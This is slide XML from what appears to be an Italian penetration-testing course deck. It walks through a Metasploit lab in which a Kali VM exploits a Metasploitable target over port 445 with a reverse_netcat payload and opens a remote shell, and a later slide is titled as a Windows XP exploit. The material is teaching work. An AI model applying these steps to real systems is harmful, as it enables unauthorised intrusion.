            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3794805" w="9363805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9363806" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9363806" y="3794805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3794805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="280598" y="2668281"/>
            <a:ext cx="6749832" cy="5775259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2453"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Una volta deciso l’exploit, useremo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per impostarlo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2453"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2453"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Di default, metasploit ci assegnerà un payload, un pezzo di codice che verrà caricato sulla macchina target una volta che l’exploit avrà avuto successo e che ci permetterà di eseguire del codice sul target stesso. In questo caso il payload è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>reverse_netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, ovvero un tipo di shell di comando che farà in modo di far partire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>una connessione dalla macchina target alla macchina dell’attaccante. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2453"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2453"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>A questo punto usiamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per vedere i parametri di configurazione richiesti prima di poter usare l’exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2453"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2453"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, imposteremo l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>’host remoto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> ovvero l’ip del target, poi la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>porta remota</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> che vogliamo attaccare ovvero la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> 445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e infine impostiamo la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>porta locale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>del nostro sistema su cui stabiliremo la connessione tra le due macchine, ovvero la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1752">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>5555.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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303737" y="945912"/>
            <a:ext cx="4767042" cy="9432411"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="996477" y="5057775"/>
            <a:ext cx="15381560" cy="811530"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>4 - Verifica della Sessione</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1.4 - VERIFICA COMUNICAZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10410871" y="4417684"/>
            <a:ext cx="7721132" cy="2592918"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2592918" w="7721132">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7721133" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7721133" y="2592917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2592917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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968952">
            <a:off x="10294864" y="7738304"/>
            <a:ext cx="2884794" cy="814954"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="814954" w="2884794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2884795" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2884795" y="814954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="814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377246" y="1820616"/>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Verifica comunicazione Tra Macchine</a:t>
            </a:r>
          </a:p>
        </p:txBody>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00000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="827347" y="2942308"/>
            <a:ext cx="8782448" cy="6646135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="507723" indent="-253862" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Assicurarsi che entrambe le macchine siano avviate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo sia la macchina virtuale Kali Linux che quella Metasploitable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="507723" indent="-253862" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Eseguire il comando ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Apriamo un terminale su Kali Linux e digitate il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ping seguito dall'indirizzo IP della macchina Metasploitable e lo switch -c4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>per specificare il numero di pacchetti da inviare e premete invio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Interpretare i risultati del ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Se la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>configurazione è corretta,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> vedremo una serie di righe che indicano il tempo impiegato per l'invio di ogni pacchetto, il numero di pacchetti inviati, ricevuti e persi. Se vediamo una risposta simile alla figura a destra, con il 100% dei pacchetti inviati e 0 pacchetti persi, significa che le due macchine possono comunicare correttamente tra loro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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09965" y="0"/>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602870" y="720257"/>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0" y="2198441"/>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491149" y="438998"/>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4.0 - VERIFICA DELLA SESSIONE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8031798" y="3209808"/>
            <a:ext cx="9808682" cy="4261634"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4261634" w="9808682">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9808682" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9808682" y="4261634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4261634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-906" r="0" b="-620"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="635024" y="2827745"/>
            <a:ext cx="5728624" cy="4987661"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>infine, usiamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>per far partire il nostro attacco.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il  messaggio di metasploit che dice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Command shell session 1 opened </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>ci indica che la sessione di shell è aperta e possiamo eseguire dei comandi sulla macchina target. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Eseguiamo il comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>e riceveremo la configurazione di rete della macchina target, infatti appare l’indirizzo IP 192.168.50.150</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1915">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L’exploit ha avuto successo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2682"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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219042" y="442756"/>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0739519" y="2524382"/>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2110547" y="3815306"/>
            <a:ext cx="14768151" cy="2118334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="7769"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>GIORNO   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10499" spc="-955">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>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19" id="19"/>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2" id="22"/>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
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4659592" y="6724069"/>
            <a:ext cx="14768151" cy="1177056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>EXPLOIT WINDOW XP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4292"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5800" spc="-527">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>CON METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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245868" y="-635766"/>
            <a:ext cx="7548481" cy="7001216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7001216" w="7548481">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7548482" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7548482" y="7001217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7001217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1194065" y="44628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9954" y="763155"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="15751273" y="-1086697"/>
            <a:ext cx="3863920" cy="3699704"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3699704" w="3863920">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3863920" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3863920" y="3699704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3699704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3796150" y="763155"/>
            <a:ext cx="13253600" cy="8642702"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3490660" cy="2276267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3490660" cy="2276267"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2276267" w="3490660">
                  <a:moveTo>
                    <a:pt x="14603" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3476057" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3479930" y="0"/>
                    <a:pt x="3483644" y="1539"/>
                    <a:pt x="3486383" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
